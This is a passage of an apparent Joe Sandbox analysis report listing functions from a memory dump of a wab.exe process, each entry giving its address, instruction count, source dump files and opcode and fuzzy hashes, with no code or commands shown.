                    Function 21382840 Relevance: .6, Instructions: 605COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 34814e9abbad54b3edecae2caf6ea8ec3a6dc7e8cdb5f3e9d7fbf4070c324e72
                    • Instruction ID: aeff61851a3cb9b918dd7cc8375576e09b2805e3345f9ab5d797c4ed781f12be
                    • Opcode Fuzzy Hash: 34814e9abbad54b3edecae2caf6ea8ec3a6dc7e8cdb5f3e9d7fbf4070c324e72
                    • Instruction Fuzzy Hash: DE3213B2A007598FDB15CF69C840BAEBBF7BF85708F20411DD46A9B285D735A942CF90
                    Function 2141A118 Relevance: .6, Instructions: 591COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3b9fa61a6d47d3ab4c8abea51f556f189b82320c2ff113f49f0fea9a0c08107e
                    • Instruction ID: e3c3388096a3ae3a3ace7095c60fa25ffe73d5bd5bcc456592e5cf6e579aac73
                    • Opcode Fuzzy Hash: 3b9fa61a6d47d3ab4c8abea51f556f189b82320c2ff113f49f0fea9a0c08107e
                    • Instruction Fuzzy Hash: E222AC702046E18AE715CF29C090772BBE1AF46344F24885FD99E8B38AD735E552DB71
                    Function 21398DBF Relevance: .6, Instructions: 554COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1cfefb2a8f96f0641205ea85a121ae9907bfe5d21a3d25c260d8272a48df5f02
                    • Instruction ID: 12c3a1c60c9bac99a41ec4aab6cc95ed8e34cf01046e5e5e2dd436cc93f2c291
                    • Opcode Fuzzy Hash: 1cfefb2a8f96f0641205ea85a121ae9907bfe5d21a3d25c260d8272a48df5f02
                    • Instruction Fuzzy Hash: 8D225072E0011ADBDB05CF95C4909BEFBF7BF85708B5480AAE945AB241E735DE41CB60
                    Function 21376A50 Relevance: .5, Instructions: 548COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6730079a787d95ffbb7ef02a382e236536d9838ede07f79a0af3efd76e045bf4
                    • Instruction ID: ec8990455af1ac68d30a9deecc25ff6df5386ec45297f46dd616b8f2f078d628
                    • Opcode Fuzzy Hash: 6730079a787d95ffbb7ef02a382e236536d9838ede07f79a0af3efd76e045bf4
                    • Instruction Fuzzy Hash: 8332B0B2A00205CFEB15CF69C490B9AB7F6FF49308F10456DE95AAB751DB34E942CB90
                    Function 21394A35 Relevance: .4, Instructions: 423COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                    • Instruction ID: 531a62bea0b5272c8391d0d65e277aa96c4bf8fc85c453f09734d95a10bf598f
                    • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                    • Instruction Fuzzy Hash: 42F17E71E0024A9FDB15CF99C690AEEBBF6AF49728F04812DE905AB245E734D941CB60
                    Function 2140892B Relevance: .4, Instructions: 386COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f1838ea862d8020b0f729c2fbb14854940963de0b52a0639e569ff45806597d1
                    • Instruction ID: 5a10c8e521071d95e8e3c4c788a637a3a5b61546bbaa8f2b3d59ffe6483ed92a
                    • Opcode Fuzzy Hash: f1838ea862d8020b0f729c2fbb14854940963de0b52a0639e569ff45806597d1
                    • Instruction Fuzzy Hash: 27D1F371E0060A8FDB09CF5AC941AEEBBF5AF88314F148179D959A7341E739DA06CB60
                    Function 213765D0 Relevance: .4, Instructions: 383COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 95ca5c946b3ca31088d5bcc0ab41807a61a8dfdca9358a4c367a4dd50caab11f
                    • Instruction ID: 0478f2ebb9a3553dfeff8d9c0ea16172f17a2afe7bdb5b1cc3d8db6b97771017
                    • Opcode Fuzzy Hash: 95ca5c946b3ca31088d5bcc0ab41807a61a8dfdca9358a4c367a4dd50caab11f
                    • Instruction Fuzzy Hash: 74E180B1508342CFD705CF28C0A0A5ABBF6FF8A318F05896DE59597351DB35E906CB91
                    Function 21368397 Relevance: .4, Instructions: 380COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 63e707e26f5d53888b021a7924d36e05876f1ad135a68648cda232f8e653ee6e
                    • Instruction ID: abf18d8bb2263e748c2e9d4637eb1216a21bfc875d8d968ec618097806c8ba26
                    • Opcode Fuzzy Hash: 63e707e26f5d53888b021a7924d36e05876f1ad135a68648cda232f8e653ee6e
                    • Instruction Fuzzy Hash: 90D1D171A0034ADFDB14CF28C890EAA77AEAF5875CF00417DEA159B288E734DA51CB54
                    Function 213F8243 Relevance: .3, Instructions: 322COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                    • Instruction ID: 62bd8bee3731e11ad1cb27e6da9370c87609aee3da7cf357a2cadd9f5485c2a9
                    • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                    • Instruction Fuzzy Hash: 7FB14275A00605AFDF18CB55C940EABBBBBEF85318F6044BDAA42A7791DB34E905CB10
                    Function 21380535 Relevance: .3, Instructions: 300COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                    • Instruction ID: 3161874e9343571c7f82e57599709d52f0afe98c36bebf9d2d4cb1ad1b795114
                    • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                    • Instruction Fuzzy Hash: 07B12832604646EFDB15CB68C850FAEBBFBEF45318F150299E556D7281DB30EA41CB90
                    Function 213783C0 Relevance: .3, Instructions: 281COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 75adefc02b929a5fb1c13441576e704d50af7904ca2e31c8fee048295dc181b1
                    • Instruction ID: 60a1c67e03ecffa2056c029114103a7c84913834e32900f6fadb5640e83881ca
                    • Opcode Fuzzy Hash: 75adefc02b929a5fb1c13441576e704d50af7904ca2e31c8fee048295dc181b1
                    • Instruction Fuzzy Hash: 10C13975508341CFD760CF19C484BAAB7F6BF98308F40496DE98997291E778EA05CF92
                    Function 2136C427 Relevance: .3, Instructions: 280COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5a0d53d496e28100cfda68e4451a36ee7d35d3782099473d9ebc0b81262a1051
                    • Instruction ID: 33407aa64f37ed8297eac18590d9f2991f9716e265fb2c3338c55663084932e6
                    • Opcode Fuzzy Hash: 5a0d53d496e28100cfda68e4451a36ee7d35d3782099473d9ebc0b81262a1051
                    • Instruction Fuzzy Hash: 2CB18470A002A98FD724CF59C890BA9B7FAEF44758F0085E9D54AE7245EB30DEC5CB25
                    Function 2139E5E7 Relevance: .3, Instructions: 278COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8afb5335f9347686efc3e1a8a59768cbfbefa290620c4fb520a252fca9279d67
                    • Instruction ID: 3a7c2c334e9aa62e3ba17ddc62cc0d8396b6829b26998580e03668fb613b5ed1
                    • Opcode Fuzzy Hash: 8afb5335f9347686efc3e1a8a59768cbfbefa290620c4fb520a252fca9279d67
                    • Instruction Fuzzy Hash: A6A10732E00659AFEB11CB58C984F9E7BEBAB0176CF110165EA10AB291D7749E41CBD1
                    Function 213B0185 Relevance: .3, Instructions: 276COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 170469c3090dc3b7f3bf11f07a022236a060e3512475a4e5fe2f3efa40637409
                    • Instruction ID: 9cc25b894733b68324c00a89620138761779b8cd51a65069249d1298c534979f
                    • Opcode Fuzzy Hash: 170469c3090dc3b7f3bf11f07a022236a060e3512475a4e5fe2f3efa40637409
                    • Instruction Fuzzy Hash: AAA1F370B0171ADFDB15CF65C590B9AB7B6FF5532CF00402AEA09A7681EB38EA01CB50
                    Function 21444500 Relevance: .3, Instructions: 275COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3a05a0e61814ade42d28fe71aff4d197a66e11f05a4da9e57716e1e52955036d
                    • Instruction ID: 6535e8f1df767242d94f337e450689772020907c606ff72bb6c6b411cf6c3ea5
                    • Opcode Fuzzy Hash: 3a05a0e61814ade42d28fe71aff4d197a66e11f05a4da9e57716e1e52955036d
                    • Instruction Fuzzy Hash: 19A1CC72A00652DFE701CF18C980B1AB7EAFF49758F854528E58D9B761D734ED01CB91
                    Function 213F60E0 Relevance: .3, Instructions: 264COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bdd56e4662c031fefb06f37ae1f56c15ef5566bfa9ba1ceb41621cd4376ee0f3
                    • Instruction ID: ea61a2c281994a11ff7c315e995631ba340936a1d764aad77299c08840ab3b73
                    • Opcode Fuzzy Hash: bdd56e4662c031fefb06f37ae1f56c15ef5566bfa9ba1ceb41621cd4376ee0f3
                    • Instruction Fuzzy Hash: FB9161B5D0021AAFDB15CF68D890BAEBBBBEB49718F114169E610EB351D734D9009BE0
                    Function 2138E3F0 Relevance: .3, Instructions: 261COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3b8e089f8608b24ed0b7dcc7a5d206aaa3d4991b71b2dc8b3ad6036cfdb86798
                    • Instruction ID: cdf9419ccef928671a71bfbbb62c2d74cf921bc90d818b50809e90ea27e7dc58
                    • Opcode Fuzzy Hash: 3b8e089f8608b24ed0b7dcc7a5d206aaa3d4991b71b2dc8b3ad6036cfdb86798
                    • Instruction Fuzzy Hash: AF91F433A00616DFE7109F69C480B6A7BEBEF9571CF224069ED09AB255E634DD01C7A1
                    Function 213C6ACC Relevance: .2, Instructions: 226COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5975df289fa87dced052bd880e4776b8aec532b9a0cc1e7bd720ea0628236198
                    • Instruction ID: 70da2e53b54e745a93e9a57290bbfc3e1ef811cc6f902065f5a79c7609319f29
                    • Opcode Fuzzy Hash: 5975df289fa87dced052bd880e4776b8aec532b9a0cc1e7bd720ea0628236198
                    • Instruction Fuzzy Hash: C18173B1A0061A9FDB14CF69C950AAEBBFAFB48B14F10852EE445E7740E734ED41CB94
                    Function 2143AB40 Relevance: .2, Instructions: 222COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                    • Instruction ID: c4407e127c02db1039ae8f29583a8d2f0cf557898a93bd58035954473b59e3ba
                    • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                    • Instruction Fuzzy Hash: E3815071A002069FDB09CF59C894AAEBBF6BFD8310F24856ED919DB345D774EA02CB50
                    Function 21366D10 Relevance: .2, Instructions: 216COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 75429609dc7f58e2932e1e08dbe7a933048aa3492894e2015768a09c69c3adb1
                    • Instruction ID: e35eb7854c9337ab0ce92c73ce0573ca058950963fe02e799de2b2d1a74cdb22
                    • Opcode Fuzzy Hash: 75429609dc7f58e2932e1e08dbe7a933048aa3492894e2015768a09c69c3adb1
                    • Instruction Fuzzy Hash: 7E71A0B16043469FDB11DF25C880B5AB7EAFB49B58F02892EE955D7200E730ED44CBD2
                    Function 213AE284 Relevance: .2, Instructions: 212COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1155ae407223630bc0cf3fe9e353def2bc1098ea8c9319f6cebbad92e14dbcc2
                    • Instruction ID: 962295e79344cb3902cde21471dea5ceb9deda26532d4f7cf4ab69d5ac80a51c
                    • Opcode Fuzzy Hash: 1155ae407223630bc0cf3fe9e353def2bc1098ea8c9319f6cebbad92e14dbcc2
                    • Instruction Fuzzy Hash: E8813F71A00619EFDB15CFA9C880ADEBBFAFF88358F10452DE599A7250D730AD45CB60
                    Function 2138C640 Relevance: .2, Instructions: 206COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7be2458d1957177ca71240f105953a487838e7d6301e3be32f72c37d34c5c9db
                    • Instruction ID: 5a6d66f6287bff1791c3c36ece8e4f91849e90224395b8861846c5c0bb913c22
                    • Opcode Fuzzy Hash: 7be2458d1957177ca71240f105953a487838e7d6301e3be32f72c37d34c5c9db
                    • Instruction Fuzzy Hash: 1471F576D01269DFCB11CF58C450BEDBBBAFF49B18F15416AE846AB390D734A904CB90
                    Function 21408D6B Relevance: .2, Instructions: 206COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f0c1e9f8efdefbea3000c5382e4df87b3b8984159b63e046065d33a63be16c80
                    • Instruction ID: be47eb8839cfe83a9b12f5f5e949c5f74c7aae7ef0dc00a8b78bf3218bf4d25e
                    • Opcode Fuzzy Hash: f0c1e9f8efdefbea3000c5382e4df87b3b8984159b63e046065d33a63be16c80
                    • Instruction Fuzzy Hash: 7E71B170D042569FDB09CF6AC940ABABBF5EF45314F048079E998DB352E339DA45C7A0
                    Function 2138260B Relevance: .2, Instructions: 201COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3b4dcbcaa0b7fc3b70934f507a34608e2069ed34b5eb6b39e5d4e02185806a82
                    • Instruction ID: 81a95a35f0a7795fc9d88e5fc0155b7390801d8350f007327283c086751201bb
                    • Opcode Fuzzy Hash: 3b4dcbcaa0b7fc3b70934f507a34608e2069ed34b5eb6b39e5d4e02185806a82
                    • Instruction Fuzzy Hash: 3571E2726046428FD301CF29C480B26B7EAFF85318F0685AAF899CB352DB74DD46CB91
                    Function 213F035C Relevance: .2, Instructions: 198COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                    • Instruction ID: 792665cbaa06866e03beba0ac993567928a7cde8f4c7ebfe3dd22f2c35e54700
                    • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                    • Instruction Fuzzy Hash: 76714D71A0061AEFDB10CFA9C984EDEBBBAFF58708F104569E505E7250DB34EA45CB90
                    Function 214062A0 Relevance: .2, Instructions: 198COMMON
                    Download Yara Rule
                    Memory Dump Source
